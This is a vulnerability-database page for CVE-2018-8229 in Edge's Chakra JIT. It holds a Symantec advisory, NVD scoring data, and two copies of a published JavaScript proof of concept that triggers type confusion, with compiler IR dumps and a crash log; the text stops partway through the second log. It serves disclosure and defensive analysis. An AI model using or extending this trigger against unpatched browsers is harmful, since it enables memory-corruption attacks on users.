Microsoft Chakra Scripting Engine CVE-2018-8229 Remote Memory Corruption Vulnerability
2018-06-12T00:00:00
ID SMNTC-104369 Type symantec Reporter Symantec Security Response Modified 2018-06-12T00:00:00
Description
Microsoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.
Technologies Affected
Microsoft ChakraCore
Microsoft Edge
Recommendations
Run all software as a nonprivileged user with minimal access rights.
To reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes, but is not limited to, requests that contain NOP sleds and unexplained incoming or outgoing traffic. Such activity may indicate exploit attempts or the after-effects of a successful exploit.
Do not follow links provided by unknown or untrusted sources.
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.
Implement multiple redundant layers of security.
Memory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.
Updates are available. Please see the references or vendor advisory for more information.
{"id": "SMNTC-104369", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Chakra Scripting Engine CVE-2018-8229 Remote Memory Corruption Vulnerability", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "published": "2018-06-12T00:00:00", "modified": "2018-06-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104369", "reporter": "Symantec Security Response", "references": [], "cvelist": ["CVE-2018-8229"], "lastseen": "2018-06-13T00:08:36", "viewCount": 4, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2018-06-13T00:08:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8229"]}, {"type": "exploitdb", "idList": ["EDB-ID:45013"]}, {"type": "zdt", "idList": ["1337DAY-ID-30708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148527"]}, {"type": "kaspersky", "idList": ["KLA11264", "KLA11265"]}, {"type": "threatpost", "idList": ["THREATPOST:455B7050303F6EBB708DA86EB2C4872C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813530", "OPENVAS:1361412562310813527", "OPENVAS:1361412562310813529", "OPENVAS:1361412562310813526", "OPENVAS:1361412562310813528"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JUN_4284860.NASL", "SMB_NT_MS18_JUN_4284819.NASL", "SMB_NT_MS18_JUN_4284874.NASL", "SMB_NT_MS18_JUN_4284880.NASL", "SMB_NT_MS18_JUN_4284835.NASL"]}, {"type": "talosblog", "idList": ["TALOSBLOG:30BC73E0EDF7739A87A63A99D8A6E0D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F2BD1E9071121715A43D46B35B2E97A7"]}], "modified": "2018-06-13T00:08:36", "rev": 2}, "vulnersScore": 8.1}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-09T20:25:47", "description": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8227.", "edition": 6, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-14T12:29:00", "title": "CVE-2018-8229", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8229"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:edge:-", "cpe:/a:microsoft:chakracore:1.8.4"], "id": "CVE-2018-8229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8229", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-07-12T19:08:34", "description": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions. CVE-2018-8229. 
Dos exploit for Windows platform. Tags: Type Con...", "published": "2018-07-12T00:00:00", "type": "exploitdb", "title": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "EDB-ID:45013", "href": "https://www.exploit-db.com/exploits/45013/", "sourceData": "/*\r\nHere's a PoC:\r\n*/\r\n\r\nfunction opt(str) {\r\n for (let i = 0; i < 200; i++) {\r\n let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n }\r\n}\r\n\r\nopt('x');\r\nopt(0x1234);\r\n\r\n/*\r\nHere's the IR code of the PoC before the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var #\r\n s9.var = LdSlot s32(s18l[53]).var #\r\n s7.var = LdSlot s20(s18l[51]).var #\r\n s8.var = LdSlot s19(s18l[52]).var #\r\n s1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var #\r\n s2.var = LdC_A_I4 0 (0x0).i32 #\r\n s3.var = LdC_A_I4 200 (0xC8).i32 #\r\n s4.var = LdC_A_I4 1 (0x1).i32 #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n\r\n\r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32 #000b \r\n BrLt_A $L3, s8.var, s3.var #000b \r\n Br $L2 #0010 \r\n---------\r\n$L3: #0013 \r\n\r\n\r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n s13.var = Ld_A s7.var #0013 \r\n CheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var #\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n s36.var = BytecodeArgOutCapture s13.var #001d \r\n 
s24[String].var = Conv_PrimStr s5.var #0020 \r\n s25[String].var = Conv_PrimStr s7.var #0020 \r\n s26[String].var = Conv_PrimStr s6.var #0020 \r\n ByteCodeUses s7 #0020 \r\n s27.var = SetConcatStrMultiItemBE s24[String].var #0020 \r\n s28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \r\n s29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \r\n s35.var = BytecodeArgOutCapture s14.var #0025 \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \r\n arg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \r\n arg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \r\n ByteCodeUses s12 #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \r\n s9.var = Ld_A s31.var #0032 \r\n\r\n\r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s8.var = Incr_A s8.var #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n\r\n\r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #0038 \r\n s16.i64 = Ld_I4 61 (0x3D).i64 #003d \r\n s19(s18l[52]).var = StSlot s8.var #003e \r\n s32(s18l[53]).var = StSlot s9.var #003e \r\n StLoopBodyCount s17.i32 #003e \r\n Ret s16.i64 #003e \r\n----------------------------------------------------------------------------------------\r\n\r\nAfter the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var! #\r\n s9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! #\r\n s7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! #\r\n s8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! 
#\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n s42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly)\r\n s27.var = SetConcatStrMultiItemBE s5[String].var #0020 \r\n s49[String].var = Conv_PrimStr s7<s44>[String].var #\r\n s28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \r\n s29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \r\n BailTarget # Bailout: #000b (BailOutShared)\r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n\r\n\r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32! #000b \r\n BrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \r\n\r\n\r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n CheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \r\n arg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \r\n arg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls)\r\n s9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! 
#0032 \r\n\r\n\r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n\r\n\r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #003d \r\n s8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \r\n s19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \r\n s32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \r\n StLoopBodyCount s17.i32! #003e \r\n Ret 61 (0x3D).i32 #003e \r\n----------------------------------------------------------------------------------------\r\n\r\nCrash log:\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x1000000001234 \r\nRBX: 0x7ffff47c5ff4 --> 0x31 ('1')\r\nRCX: 0x7ff7f4600000 --> 0x0 \r\nRDX: 0x0 \r\nRSI: 0x80000001 --> 0x0 \r\nRDI: 0x1000000001234 \r\nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...)\r\nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10)\r\nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR9 : 0x7ff7f4600000 --> 0x0 \r\nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR12: 0x0 \r\nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR14: 0x0 \r\nR15: 0x1000000001234\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1\r\n 0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10]\r\n 0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18]\r\n=> 
0x7ff7f385017a: cmp QWORD PTR [rax],r10\r\n 0x7ff7f385017d: je 0x7ff7f385037c\r\n 0x7ff7f3850183: mov rcx,rax\r\n 0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx\r\n 0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp)\r\n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...)\r\n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22])\r\n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp)\r\n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00007ff7f385017a in ?? ()\r\n\r\n\r\nBackground:\r\nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. 
When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction.\r\n\r\nWhat happens here is:\r\n1. The CheckFixedFld instruction ensures the type of s7 to be String.\r\n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop.\r\n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String).\r\n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all.\r\n5. No type check will be performed. It will result in type confusion.\r\n*/", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45013/"}], "zdt": [{"lastseen": "2018-07-13T02:02:49", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2018-07-12T00:00:00", "title": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "1337DAY-ID-30708", "href": "https://0day.today/exploit/description/30708", "sourceData": "/*\r\nHere's a PoC:\r\n*/\r\n \r\nfunction opt(str) {\r\n for (let i = 0; i < 200; i++) {\r\n let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n }\r\n}\r\n \r\nopt('x');\r\nopt(0x1234);\r\n \r\n/*\r\nHere's the IR code of the PoC before the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var #\r\n s9.var = LdSlot s32(s18l[53]).var #\r\n s7.var = LdSlot s20(s18l[51]).var #\r\n s8.var = LdSlot 
s19(s18l[52]).var #\r\n s1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var #\r\n s2.var = LdC_A_I4 0 (0x0).i32 #\r\n s3.var = LdC_A_I4 200 (0xC8).i32 #\r\n s4.var = LdC_A_I4 1 (0x1).i32 #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n \r\n \r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32 #000b \r\n BrLt_A $L3, s8.var, s3.var #000b \r\n Br $L2 #0010 \r\n---------\r\n$L3: #0013 \r\n \r\n \r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n s13.var = Ld_A s7.var #0013 \r\n CheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var #\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n s36.var = BytecodeArgOutCapture s13.var #001d \r\n s24[String].var = Conv_PrimStr s5.var #0020 \r\n s25[String].var = Conv_PrimStr s7.var #0020 \r\n s26[String].var = Conv_PrimStr s6.var #0020 \r\n ByteCodeUses s7 #0020 \r\n s27.var = SetConcatStrMultiItemBE s24[String].var #0020 \r\n s28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \r\n s29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \r\n s35.var = BytecodeArgOutCapture s14.var #0025 \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \r\n arg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \r\n arg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \r\n ByteCodeUses s12 #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \r\n 
s9.var = Ld_A s31.var #0032 \r\n \r\n \r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s8.var = Incr_A s8.var #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n \r\n \r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #0038 \r\n s16.i64 = Ld_I4 61 (0x3D).i64 #003d \r\n s19(s18l[52]).var = StSlot s8.var #003e \r\n s32(s18l[53]).var = StSlot s9.var #003e \r\n StLoopBodyCount s17.i32 #003e \r\n Ret s16.i64 #003e \r\n----------------------------------------------------------------------------------------\r\n \r\nAfter the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var! #\r\n s9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! #\r\n s7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! #\r\n s8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n s42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly)\r\n s27.var = SetConcatStrMultiItemBE s5[String].var #0020 \r\n s49[String].var = Conv_PrimStr s7<s44>[String].var #\r\n s28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \r\n s29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \r\n BailTarget # Bailout: #000b (BailOutShared)\r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n \r\n \r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32! 
#000b \r\n BrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \r\n \r\n \r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n CheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \r\n arg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \r\n arg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls)\r\n s9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! #0032 \r\n \r\n \r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n \r\n \r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #003d \r\n s8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \r\n s19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \r\n s32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \r\n StLoopBodyCount s17.i32! 
#003e \r\n Ret 61 (0x3D).i32 #003e \r\n----------------------------------------------------------------------------------------\r\n \r\nCrash log:\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x1000000001234 \r\nRBX: 0x7ffff47c5ff4 --> 0x31 ('1')\r\nRCX: 0x7ff7f4600000 --> 0x0 \r\nRDX: 0x0 \r\nRSI: 0x80000001 --> 0x0 \r\nRDI: 0x1000000001234 \r\nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...)\r\nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10)\r\nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR9 : 0x7ff7f4600000 --> 0x0 \r\nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR12: 0x0 \r\nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR14: 0x0 \r\nR15: 0x1000000001234\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1\r\n 0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10]\r\n 0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18]\r\n=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10\r\n 0x7ff7f385017d: je 0x7ff7f385037c\r\n 0x7ff7f3850183: mov rcx,rax\r\n 0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx\r\n 0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp)\r\n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 
0x10f1215030708 \r\n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...)\r\n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22])\r\n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp)\r\n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: 